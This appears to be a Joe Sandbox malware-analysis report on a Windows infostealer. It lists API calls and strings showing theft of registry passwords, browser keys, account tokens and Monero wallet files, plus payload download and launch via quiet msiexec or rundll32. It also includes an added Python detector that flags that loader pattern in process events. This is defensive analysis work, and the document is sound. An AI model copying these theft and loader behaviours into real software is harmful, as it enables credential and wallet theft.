• Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID: image/jpeg
                  • API String ID: 2244384528-3785015651
                  • Opcode ID: c54b3dde8ed9217351eed551a71ac5d2787b06a25da1d0a895712c40ce02fd7f
                  • Instruction ID: 00f5102f3e764b9dbdea188c04960e34b79214f6fb693fecbd2e699a7174e1bc
                  • Opcode Fuzzy Hash: c54b3dde8ed9217351eed551a71ac5d2787b06a25da1d0a895712c40ce02fd7f
                  • Instruction Fuzzy Hash: 2D711075900209ABCB18DFE4ED89FEDB7B8BF48700F14811CF519A7284DB79A945DB60
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00FC31C5
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00FC335D
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00FC34EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell$lstrcpy
                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                  • API String ID: 2507796910-3625054190
                  • Opcode ID: 8016780d16bf68d3e6c3095108ad8a20efde23346f0c7f3f151311b5fb0b9352
                  • Instruction ID: 375b9023a76a356227f38f3f06603f758557a65a40eca00d8c1783ade78a543a
                  • Opcode Fuzzy Hash: 8016780d16bf68d3e6c3095108ad8a20efde23346f0c7f3f151311b5fb0b9352
                  • Instruction Fuzzy Hash: A312FB7180010D9BDB19EBA0DE93FEDB738AF14304F54415DE50666191EF387B4AEBA2
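The three `ShellExecuteEx` calls above, together with the strings `C:\Windows\system32\msiexec.exe`, `/i "`, ` /passive`, `.msi`, `C:\Windows\system32\rundll32.exe` and `.dll`, are the sample's loader path: a file it has fetched is run either as an MSI package via `msiexec /i "<path>" /passive` (unattended install, progress bar only) or as a DLL via `rundll32`. Both are signed Windows binaries, so the signal for detection is the command line and the location of the package or DLL, not the image. The following is an added detection example, not part of the Joe Sandbox report, that runs over constructed Sysmon-style process-creation records and flags exactly that shape: msiexec installing a `.msi` from a user-writable directory with a quiet switch, and rundll32 loading a `.dll` from a user-writable directory. The event records, the user/host names in them and the set of "user-writable" prefixes are assumptions made for the example.

```python
import re
from typing import List, Optional

# Constructed Sysmon-style process-creation records (EID 1 fields); none of these come from the report.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\system32\msiexec.exe",
     "command_line": r'C:\Windows\system32\msiexec.exe /i "C:\Users\alice\AppData\Local\Temp\pkg.msi" /passive',
     "parent_image": r"C:\Users\alice\AppData\Local\Temp\file.exe"},
    {"image": r"C:\Windows\system32\rundll32.exe",
     "command_line": r'C:\Windows\system32\rundll32.exe "C:\Users\alice\AppData\Roaming\mod.dll",Main',
     "parent_image": r"C:\Users\alice\AppData\Local\Temp\file.exe"},
    {"image": r"C:\Windows\System32\msiexec.exe",          # service-side msiexec, normal
     "command_line": r"C:\Windows\System32\msiexec.exe /V",
     "parent_image": r"C:\Windows\System32\services.exe"},
    {"image": r"C:\Windows\System32\rundll32.exe",         # Control Panel applet launch, normal
     "command_line": r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\msiexec.exe",          # quiet install from a protected path, normal
     "command_line": r'C:\Windows\System32\msiexec.exe /i "C:\Program Files\Vendor\setup.msi" /qn',
     "parent_image": r"C:\Windows\System32\svchost.exe"},
]

# Locations a standard user can write to (assumed list); a package or DLL run from here is the loader shape.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\(users\\[^\\]+\\(appdata|downloads|desktop|documents)|users\\public|programdata|windows\\temp)\\"
)
QUIET_SWITCHES = {"/passive", "/qn", "/qb", "/quiet", "/q"}


def split_cmdline(cmd: str) -> List[str]:
    """Tokenise a Windows command line: whitespace separates tokens, double quotes group and are removed."""
    tokens, cur, in_quotes = [], [], False
    for ch in cmd:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def user_writable(path: str) -> bool:
    return bool(USER_WRITABLE.match(path.lower()))


def classify(event: dict) -> Optional[str]:
    """Return a finding name when the event matches the msiexec/rundll32 loader shape, else None."""
    exe = event["image"].rsplit("\\", 1)[-1].lower()
    args = [a.lower() for a in split_cmdline(event["command_line"])[1:]]  # drop the image itself
    if exe == "msiexec.exe":
        try:  # the package path is the token after /i (or -i); missing switch or path means no match
            pkg = args[args.index("/i") + 1] if "/i" in args else args[args.index("-i") + 1]
        except (ValueError, IndexError):
            return None
        if pkg.endswith(".msi") and user_writable(pkg) and QUIET_SWITCHES & set(args):
            return "msiexec_quiet_install_from_user_writable_path"
    elif exe == "rundll32.exe" and args:
        dll = args[0].split(",", 1)[0]  # strip a ",ExportName" suffix if present
        if dll.endswith(".dll") and user_writable(dll):
            return "rundll32_dll_from_user_writable_path"
    return None


def scan(events: List[dict]) -> List[dict]:
    """Apply classify() to every record and keep the hits with their parent for triage."""
    findings = []
    for ev in events:
        name = classify(ev)
        if name:
            findings.append({"finding": name, "parent": ev["parent_image"], "command_line": ev["command_line"]})
    return findings
```

`scan(SAMPLE_EVENTS)` returns the two records spawned by `file.exe` and nothing for the three benign ones. The client-side msiexec that the stealer launches is the process that carries the `/i ... /passive` command line; the service-side `msiexec.exe /V` under `services.exe` that handles the actual install is normal and is not flagged. In production the parent image is the second half of the signal: an msiexec or rundll32 whose parent is an unsigned executable in a temp directory, as in the first two records, should raise the severity further.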
                  APIs
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                    • Part of subcall function 00FB6280: InternetOpenA.WININET(00FD0DFE,00000001,00000000,00000000,00000000), ref: 00FB62E1
                    • Part of subcall function 00FB6280: StrCmpCA.SHLWAPI(?,00C8EAA8), ref: 00FB6303
                    • Part of subcall function 00FB6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB6335
                    • Part of subcall function 00FB6280: HttpOpenRequestA.WININET(00000000,GET,?,00C8E368,00000000,00000000,00400100,00000000), ref: 00FB6385
                    • Part of subcall function 00FB6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FB63BF
                    • Part of subcall function 00FB6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FB63D1
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FC5318
                  • lstrlen.KERNEL32(00000000), ref: 00FC532F
                    • Part of subcall function 00FC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FC8E52
                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00FC5364
                  • lstrlen.KERNEL32(00000000), ref: 00FC5383
                  • lstrlen.KERNEL32(00000000), ref: 00FC53AE
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 3240024479-1526165396
                  • Opcode ID: 455ed202a1a5cf42c8c5aa1de5606a00d89505b2cf978ca056f8839c9832b709
                  • Instruction ID: 1713332b3ea25cc6a71ae414df05d6f002d17e966d9bd4d67eca6f0414adead0
                  • Opcode Fuzzy Hash: 455ed202a1a5cf42c8c5aa1de5606a00d89505b2cf978ca056f8839c9832b709
                  • Instruction Fuzzy Hash: 5351B77091014EABDB18EF60DE97FED7779AF50304F50402CE40A5A592EF387A46EB62
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen
                  • String ID:
                  • API String ID: 2001356338-0
                  • Opcode ID: fe00b27e1f5ec65b6911bce2e847649ad17e95aca3ae17912eaf7dbc6eb9bb6a
                  • Instruction ID: 6225ebc5c509eaa74d62fc8ece741f37cd16bf73d714f24912264886e90e9dc1
                  • Opcode Fuzzy Hash: fe00b27e1f5ec65b6911bce2e847649ad17e95aca3ae17912eaf7dbc6eb9bb6a
                  • Instruction Fuzzy Hash: 1AC1A6B590011E9BCB18EF60DD8AFEA7378BF54304F00459CE11E67181EA78EA95DF91
                  APIs
                    • Part of subcall function 00FC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FC8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC42EC
                  • lstrcat.KERNEL32(?,00C8E2D8), ref: 00FC430B
                  • lstrcat.KERNEL32(?,?), ref: 00FC431F
                  • lstrcat.KERNEL32(?,00C8D2D8), ref: 00FC4333
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FC8D90: GetFileAttributesA.KERNEL32(00000000,?,00FB1B54,?,?,00FD564C,?,?,00FD0E1F), ref: 00FC8D9F
                    • Part of subcall function 00FB9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00FB9D39
                    • Part of subcall function 00FB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                    • Part of subcall function 00FB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                    • Part of subcall function 00FB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
                    • Part of subcall function 00FB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                    • Part of subcall function 00FB99C0: LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                    • Part of subcall function 00FB99C0: CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                    • Part of subcall function 00FC93C0: GlobalAlloc.KERNEL32(00000000,00FC43DD,00FC43DD), ref: 00FC93D3
                  • StrStrA.SHLWAPI(?,00C8E278), ref: 00FC43F3
                  • GlobalFree.KERNEL32(?), ref: 00FC4512
                    • Part of subcall function 00FB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9AEF
                    • Part of subcall function 00FB9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B01
                    • Part of subcall function 00FB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9B2A
                    • Part of subcall function 00FB9AC0: LocalFree.KERNEL32(?,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B3F
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC44A3
                  • StrCmpCA.SHLWAPI(?,00FD08D1), ref: 00FC44C0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC44D2
                  • lstrcat.KERNEL32(00000000,?), ref: 00FC44E5
                  • lstrcat.KERNEL32(00000000,00FD0FB8), ref: 00FC44F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                  • String ID:
                  • API String ID: 3541710228-0
                  • Opcode ID: 2a1fa46370245d052945bf4a506453a45e3427508129c40e2e9f1f9636e7b63e
                  • Instruction ID: f0814fbb93b98ba6008ad029261edff889783bda987de37504968ffc32a3805b
                  • Opcode Fuzzy Hash: 2a1fa46370245d052945bf4a506453a45e3427508129c40e2e9f1f9636e7b63e
                  • Instruction Fuzzy Hash: 52719776900208ABCB14EBA0DD96FEE7779BF48300F04459CF60997181DA78EB55DF91
                  APIs
                    • Part of subcall function 00FB12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB12B4
                    • Part of subcall function 00FB12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00FB12BB
                    • Part of subcall function 00FB12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00FB12D7
                    • Part of subcall function 00FB12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00FB12F5
                    • Part of subcall function 00FB12A0: RegCloseKey.ADVAPI32(?), ref: 00FB12FF
                  • lstrcat.KERNEL32(?,00000000), ref: 00FB134F
                  • lstrlen.KERNEL32(?), ref: 00FB135C
                  • lstrcat.KERNEL32(?,.keys), ref: 00FB1377
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FC8B60: GetSystemTime.KERNEL32(00FD0E1A,00C8A450,00FD05AE,?,?,00FB13F9,?,0000001A,00FD0E1A,00000000,?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FC8B86
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00FB1465
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                    • Part of subcall function 00FB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                    • Part of subcall function 00FB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                    • Part of subcall function 00FB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
                    • Part of subcall function 00FB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                    • Part of subcall function 00FB99C0: LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                    • Part of subcall function 00FB99C0: CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                  • DeleteFileA.KERNEL32(00000000), ref: 00FB14EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                  • API String ID: 3478931302-218353709
                  • Opcode ID: 7c0e95a2df562409a2114f52c2b82723a3d25b2ba60b913607f91d054171d26c
                  • Instruction ID: fbc1808a08224817020816208fc573586efbdae158fdd11616e05be9bce53a6e
                  • Opcode Fuzzy Hash: 7c0e95a2df562409a2114f52c2b82723a3d25b2ba60b913607f91d054171d26c
                  • Instruction Fuzzy Hash: 0A5111B195011D97CB25EB60DD97FED733CAF54304F4041ACB60AA2081EE786B85DFA6
                  APIs
                    • Part of subcall function 00FB72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FB733A
                    • Part of subcall function 00FB72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00FB73B1
                    • Part of subcall function 00FB72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00FB740D
                    • Part of subcall function 00FB72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00FB7452
                    • Part of subcall function 00FB72D0: HeapFree.KERNEL32(00000000), ref: 00FB7459
                  • lstrcat.KERNEL32(00000000,00FD17FC), ref: 00FB7606
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB7648
                  • lstrcat.KERNEL32(00000000, : ), ref: 00FB765A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB768F
                  • lstrcat.KERNEL32(00000000,00FD1804), ref: 00FB76A0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB76D3
                  • lstrcat.KERNEL32(00000000,00FD1808), ref: 00FB76ED
                  • task.LIBCPMTD ref: 00FB76FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                  • String ID: :
                  • API String ID: 2677904052-3653984579
                  • Opcode ID: f420b6868061665dc96a231e4c55222be55dc5061dd36fa8fb35b1242e02ea1c
                  • Instruction ID: f0b4de491e221acd154f78deed544f5998dc977d2c433e1d6aa6f217fe8e3746
                  • Opcode Fuzzy Hash: f420b6868061665dc96a231e4c55222be55dc5061dd36fa8fb35b1242e02ea1c
                  • Instruction Fuzzy Hash: D7314DB2900209DBCB18EBA5EC85DEE7779BF84301F14412CE116A7284DA38A986EF51
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00C8DF90,00000000,?,00FD0E2C,00000000,?,00000000), ref: 00FC8130
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC8137
                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00FC8158
                  • __aulldiv.LIBCMT ref: 00FC8172
                  • __aulldiv.LIBCMT ref: 00FC8180
                  • wsprintfA.USER32 ref: 00FC81AC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                  • String ID: %d MB$@
                  • API String ID: 2774356765-3474575989
                  • Opcode ID: c77d5160bdd87b00ed9b2e92be8bd04c36e70186c9c0c0825b934167462c6028
                  • Instruction ID: 00f8227bec764aa5c044994e60427cfc4bdd326b9b026d8d146876532eb5f935
                  • Opcode Fuzzy Hash: c77d5160bdd87b00ed9b2e92be8bd04c36e70186c9c0c0825b934167462c6028
                  • Instruction Fuzzy Hash: 5F218CB1E44209ABDB14DFD4DD4AFAEB7B8FB44B10F10421DF615BB280D778A9018BA5
                  APIs
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                    • Part of subcall function 00FB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FB4839
                    • Part of subcall function 00FB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FB4849
                  • InternetOpenA.WININET(00FD0DF7,00000001,00000000,00000000,00000000), ref: 00FB610F
                  • StrCmpCA.SHLWAPI(?,00C8EAA8), ref: 00FB6147
                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00FB618F
                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00FB61B3
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00FB61DC
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00FB620A
                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00FB6249
                  • InternetCloseHandle.WININET(?), ref: 00FB6253
                  • InternetCloseHandle.WININET(00000000), ref: 00FB6260
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                  • String ID:
                  • API String ID: 2507841554-0
                  • Opcode ID: 4541cf59bd92c7ac95b667c4b480d551da3a26fcc99383abbaa8b3b80e1910f7
                  • Instruction ID: b65d145182a00c5ee008aadc94df76d73bf74b2ba94291cc5c644902d26f0fb9
                  • Opcode Fuzzy Hash: 4541cf59bd92c7ac95b667c4b480d551da3a26fcc99383abbaa8b3b80e1910f7
                  • Instruction Fuzzy Hash: C8518EB1900208ABEF24DF51DD45FEE77B8FF04705F1081A8A60AA71C0DB796A85DF95
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FB733A
                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00FB73B1
                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00FB740D
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00FB7452
                  • HeapFree.KERNEL32(00000000), ref: 00FB7459
                  • task.LIBCPMTD ref: 00FB7555
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$EnumFreeOpenProcessValuetask
                  • String ID: Password
                  • API String ID: 775622407-3434357891
                  • Opcode ID: b66d33c03dbe9038ace781819b2810ee292cef585972a13295d1919912a2a705
                  • Instruction ID: ca6c004be3d4bf12ed9d75d0622ae9f63c8de8e69a5327280ad10a2a78b4ee86
                  • Opcode Fuzzy Hash: b66d33c03dbe9038ace781819b2810ee292cef585972a13295d1919912a2a705
                  • Instruction Fuzzy Hash: 70613BB5D04218DBDB24EB51DC41BDAB7BCBF84340F0481E9E649A6141DBB46BCADFA0
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                  • lstrlen.KERNEL32(00000000), ref: 00FBBC9F
                    • Part of subcall function 00FC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FC8E52
                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 00FBBCCD
                  • lstrlen.KERNEL32(00000000), ref: 00FBBDA5
                  • lstrlen.KERNEL32(00000000), ref: 00FBBDB9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                  • API String ID: 3073930149-1079375795
                  • Opcode ID: fb89c1da0a3f09ae4bb1f766bb2946b1b60dede075dd9da8260d59b979a47bd9
                  • Instruction ID: a51ce2b73a4cf7ebe56c2d20a99202afffab2bc7b50eb761c0f66ca3273cba1f
                  • Opcode Fuzzy Hash: fb89c1da0a3f09ae4bb1f766bb2946b1b60dede075dd9da8260d59b979a47bd9
                  • Instruction Fuzzy Hash: 78B13C7191010DABDB18EBA0DE97EEE7339AF54304F40416DF506A2191EF387A49EB62
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess$DefaultLangUser
                  • String ID: *
                  • API String ID: 1494266314-163128923
                  • Opcode ID: b6794f2f294954c878756eb2de0bb20f6e40f75ada013123eab3e499736f3f08
